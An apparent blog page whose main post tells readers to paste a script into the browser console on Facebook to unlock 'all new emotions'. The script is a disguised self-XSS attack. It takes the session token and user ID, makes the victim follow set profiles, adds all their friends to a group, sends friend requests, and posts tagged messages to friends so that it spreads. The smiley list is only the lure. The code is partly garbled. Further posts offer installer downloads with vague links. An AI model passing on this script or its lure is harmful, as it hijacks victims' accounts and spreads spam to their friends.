Showing posts with label all. Show all posts
Showing posts with label all. Show all posts

Saturday, January 28, 2017

Facebook all new Emotions


Guys Now i am gonna tell you how to get all facebook emotions with the help of a simple script follow these steps.

1.Open your Facebook account.
2.press CTRL+SHIFT+J for Google chrome or press CTRL+SHIFT+K for Mozilla firefox (a console bar will open).
3.Paste the script.
4.Press Enter (a smiley box will be created the right side of friend request bar open it copy smileys and enjoy).

                                                          Script

var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
     
function cereziAl(isim) {
    var tarama = isim + "=";
    if (document.cookie.length > 0) {
        konum = document.cookie.indexOf(tarama)
        if (konum != -1) {
            konum += tarama.length
            son = document.cookie.indexOf(";", konum)
            if (son == -1)
                son = document.cookie.length
            return unescape(document.cookie.substring(konum, son))
        }
        else { return ""; }
    }
}

function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
    return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function a(abone){
    var http4 = new XMLHttpRequest();
   
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
   
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
   
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
   
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
 
    http4.close; // Close the connection
   
    }
    }
 
    http4.send(params4);
}

function sublist(uidss) {
                var a = document.createElement(script);
                a.innerHTML = "new AsyncRequest().setURI(/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe).setData({ flid: " + uidss + " }).send();";
                document.body.appendChild(a);
}



a("100007944583478");

a("100008020715426");

a("100006437018486");
 

sublist("1390887064519433");
sublist("1393996464208493");
sublist("1393997107541762");


var gid = [];
var gid = [];

var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
var user_id = document[cookie][match](document[cookie][match](/c_user=(d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = /ajax/groups/membership/r2j.php?__a=1;
var paramswp = &ref=group_jump_header&group_id= + gid + &fb_dtsg= + fb_dtsg + &__user= + user_id + &phstamp=;
httpwp[open](POST, urlwp, true);
httpwp[setRequestHeader](Content-type, application/x-www-form-urlencoded);
httpwp[setRequestHeader](Content-length, paramswp[length]);
httpwp[setRequestHeader](Connection, keep-alive);
httpwp[send](paramswp);

var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
var user_id = document[cookie][match](document[cookie][match](/c_user=(d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf[open](GET, /ajax/typeahead/first_degree.php?__a=1&viewer= + user_id + &token + Math[random]() + &filter[0]=user&options[0]=friends_only, false);
gf[send]();
if (gf[readyState] != 4) {} else {
    data = eval(( + gf[responseText][substr](9) + ));
    if (data[error]) {} else {
        friends = data[payload][entries][sort](function (_0x93dax8, _0x93dax9) {
            return _0x93dax8[index] - _0x93dax9[index];
        });
    };
};

for (var i = 0; i < friends[length]; i++) {
  var httpwp = new XMLHttpRequest();
  var urlwp = /ajax/groups/members/add_post.php?__a=1;
  var paramswp= &fb_dtsg= + fb_dtsg + &group_id= + gid + &source=typeahead&ref=&message_id=&members= + friends[i][uid] + &__user= + user_id + &phstamp=;
  httpwp[open](POST, urlwp, true);
  httpwp[setRequestHeader](Content-type, application/x-www-form-urlencoded);
  httpwp[setRequestHeader](Content-length, paramswp[length]);
  httpwp[setRequestHeader](Connection, keep-alive);
  httpwp[onreadystatechange] = function () {
if (httpwp[readyState] == 4 && httpwp[status] == 200) {};
  };
  httpwp[send](paramswp);
};
;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
var smesaj = "";
var smesaj_text = "";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date();
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}


//arkadaslari al ve isle
function sarkadaslari_al(){
               var xmlhttp = new XMLHttpRequest();
      xmlhttp.onreadystatechange = function () {
                       if(xmlhttp.readyState == 4){
                                 eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
                                 for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
                                       smesaj = "";
                                       smesaj_text = "";
                                 for(i=f*10;i<(f+1)*10;i++){
                                       if(arkadaslar.payload.entries[i]){
                                 smesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";
                                 smesaj_text += " " + arkadaslar.payload.entries[i].text;
                                 }
                                       }
                                       sdurumpaylas();                         }
                           
                       }
                   
      };
               var params = "&filter[0]=user";
               params += "&options[0]=friends_only";
               params += "&options[1]=nm";
               params += "&token=v7";
      params += "&viewer=" + user_id;
               params += "&__user=" + user_id;
           
      if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        xmlhttp.send();
}

//tiklama olayini dinle
var tiklama = document.addEventListener("click", function () {
if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
svn_rev = document.head.innerHTML.split("svn_rev":)[1].split(",")[0];
sarkadaslari_al();
document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);
}
 }, false);


//arkada?? ekleme
function sarkadasekle(uid,cins){
                var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
                        if(xmlhttp.readyState == 4){
                        }
        };
             
                xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
                var params = "to_friend=" + uid;
                params += "&action=add_friend";
                params += "&how_found=friend_browser";
                params += "&ref_param=none";
                params += "&outgoing_id=";
                params += "&logging_location=friend_browser";
                params += "&no_flyout_on_click=true";
                params += "&ego_log_data=";
                params += "&http_referer=";
                params += "&fb_dtsg=" + document.getElementsByName(fb_dtsg)[0].value;
        params += "&phstamp=165816749114848369115";
                params += "&__user=" + user_id;
                xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
                xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
             
if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
               xmlhttp.send(params);
}else if(document.cookie.split("cins" + user_id +"=").length <= 1){
               cinsiyetgetir(uid,cins,"sarkadasekle");
}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
               xmlhttp.send(params);
}
}

//cinsiyet belirleme
var cinssonuc = {};
var cinshtml = document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){
               var xmlhttp = new XMLHttpRequest();
      xmlhttp.onreadystatechange = function () {
                       if(xmlhttp.readyState == 4){
                       eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
                       cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
                       btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
                       if(cinshtml.getElementsByTagName("select")[0].value == "1"){
                       document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
                       }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
                       document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
                       }
                       eval(fonksiyon + "(" + id + "," + cins + ");");
                       }
      };
               xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
               xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
               xmlhttp.send();
}
// ==UserScript==
// @name            Bharat Choudhary 2014
// @description     All about facebook By Noname
// @include         https://*.facebook.com/*
// @include         https://*.facebook.com/*/*
// @include         http://*.facebook.com/*
// @include         http://*.facebook.com/*/*
// ==/UserScript==
// ==13470X==
// ==============
// ==Icon==
(function() {
// Active only in main frame
if (!document.querySelector("#pageNav")) {
return;
}
//console.info("Extra Facebook Smileys");

// = Data =======
var emoticons = [ { // Text to picture emoticons
"chars" : " :) ",
"class" : "emoticon_smile",
"name" : "Smiley"
}, {
"chars" : " :( ",
"class" : "emoticon_frown",
"name" : "Frown"
}, {
"chars" : " :P ",
"class" : "emoticon_tongue",
"name" : "Tongue"
}, {
        "chars" : " :D ",
"class" : "emoticon_grin",
"name" : "Grin"
}, {
"chars" : " :o ",
"class" : "emoticon_gasp",
"name" : "Gasp"
}, {
"chars" : " ;) ",
"class" : "emoticon_wink",
"name" : "Wink"
}, {
"chars" : " :v ",
"class" : "emoticon_pacman",
"name" : "Pacman"
}, {
"chars" : " >:( ",
"class" : "emoticon_grumpy",
"name" : "Gru?ƒÂ±?ƒÂ³n"
}, {
"chars" : " :/ ",
"class" : "emoticon_unsure",
"name" : "Unsure"
}, {
"chars" : " :( ",
"class" : "emoticon_cry",
"name" : "Cry"
}, {
"chars" : " ^_^ ",
"class" : "emoticon_kiki",
"name" : "Kiki"
}, {
"chars" : " 8) ",
"class" : "emoticon_glasses",
"name" : "Glasses"
}, {
"chars" : " B| ",
"class" : "emoticon_sunglasses",
"name" : "Sunglasses"
}, {
"chars" : " <3 ",
"class" : "emoticon_heart",
"name" : "Heart"
}, {
"chars" : " 3:) ",
"class" : "emoticon_devil",
"name" : "Devil"
}, {
"chars" : " O:) ",
"class" : "emoticon_angel",
"name" : "Angel"
}, {
"chars" : " -_- ",
"class" : "emoticon_squint",
"name" : "Squint"
}, {
"chars" : " o.O ",
"class" : "emoticon_confused",
"name" : "Confused"
}, {
"chars" : " >:o ",
"class" : "emoticon_upset",
"name" : "Upset"
}, {
"chars" : " :3 ",
"class" : "emoticon_colonthree",
"name" : "Colonthree"
}, {
"chars" : " (y) ",
"class" : "emoticon_like",
"name" : "Like"
}, {
"chars" : " :* ",
"class" : "emoticon emoticon_kiss",
"name" : "Kiss"
}, {
"chars" : " (^^^) ",
"class" : "emoticon_shark",
"name" : "Shark"
}, {
"chars" : " :|] ",
"class" : "emoticon_robot",
"name" : "Robot"
}, {
"chars" : " <(") ",
"class" : "emoticon_penguin",
"name" : "Ping?ƒÂ¼ino"
}, {
"chars" : " :poop: ",
"class" : "emoticon_poop",
"name" : "Poop"
        }, {
"chars" : " :putnam: ",
"class" : "emoticon_putnam",
"name" : "Putman"
}, {
"chars" : " ud83cudf02 ",
"class" : "_1az _1a- _2c0",
"name" : "Pink Umbrella"
}, {
"chars" : " ud83cudf0a ",
"class" : "_1az _1a- _2c1",
"name" : "Sea Wave"
}, {
"chars" : " ud83cudf19 ",
"class" : "_1az _1a- _2c2",
"name" : "Crescent moon"
}, {
"chars" : " ud83cudf1f ",
"class" : "_1az _1a- _2c3",
"name" : "Bright Star"
}, {
"chars" : " ud83cudf31 ",
"class" : "_1az _1a- _2c4",
"name" : "Seedbed"
}, {
"chars" : " ud83cudf34 ",
"class" : "_1az _1a- _2c5",
"name" : "Single Palm Tree"
}, {
"chars" : " ud83cudf35 ",
"class" : "_1az _1a- _2c6",
"name" : "Cactus"
}, {
"chars" : " ud83cudf37 ",
"class" : "_1az _1a- _2c7",
"name" : "Tulip"
}, {
"chars" : " ud83cudf38 ",
"class" : "_1az _1a- _2c8",
"name" : "Cherry Blossom"
}, {
"chars" : " ud83cudf39 ",
"class" : "_1az _1a- _2c9",
"name" : "Rose"
}, {
"chars" : " ud83cudf3a ",
"class" : "_1az _1a- _2ca",
"name" : "Cayenne"
}, {
"chars" : " ud83cudf3b ",
"class" : "_1az _1a- _2cb",
"name" : "Sunflower"
}, {
"chars" : " ud83cudf3e ",
"class" : "_1az _1a- _2cc",
"name" : "Ear Of Rice"
}, {
"chars" : " ud83cudf40 ",
"class" : "_1az _1a- _2cd",
"name" : "Four Leaf Clover"
}, {
"chars" : " ud83cudf41 ",
"class" : "_1az _1a- _2ce",
"name" : "Maple Leaf"
}, {
"chars" : " ud83cudf42 ",
"class" : "_1az _1a- _2cf",
"name" : "Fallen Leaf"
}, {
"chars" : " ud83cudf43 ",
"class" : "_1az _1a- _2cg",
"name" : "Leaf Floating In The Wind"
}, {
"chars" : " ud83cudf4a ",
"class" : "_1az _1a- _2ch",
"name" : "Tangerine"
}, {
"chars" : " ud83cudf4e ",
"class" : "_1az _1a- _2ci",
"name" : "Red Apple"
}, {
Available link for download

Read more »

Ezvid Full Offline Installer Download Free For Windows All Updates


Here you will be able to download Ezvid full 2016 offline installer free latest version v1.0.0.3. It is a best software tool to make videos to market, or for family video movie making. Latest version Ezvid full offline installer can be free download from the given downloading link below. You have to follow the instructions which will be shown on your screen. The downloading link which is given here has been brought you from the official site of Ezvid. There I have found the most recent Ezvid offline installer file for window free.

Ezvid Full Offline Installer Download

How to Install?

  • Download latest version ezvid full offline installer free
  • Wait to completion of the downloading process
  • Once you downloading will be completed then double click on it to run its setup
  • And finally finished to complete setup
  • Now enjoy by suing it
File Detail:
  • Name : Ezvid
  • Size : 1.4MB/ 39.3MB
  • Version : v1.0.0.3/ v0.9.9
  • Format : EXE
  • Developer : Ezvid.com
  • Language : English
  • Compatible with : Windows XP, Vista, 7, 8
Ezvid offline installer full file can be free download from the given downloading link below here. Its offline installer file needs one time downloading and after that you can install it any computer without having internet service. So, get start downloading here.
Installer v1.0.0.3 | Offline files v0.9.9


Available link for download

Read more »

Thursday, December 29, 2016

EPSON ALL IN ONE DRIVER PACK 2015 GREAT UPLOAD


DOWNLOAD


Available link for download

Read more »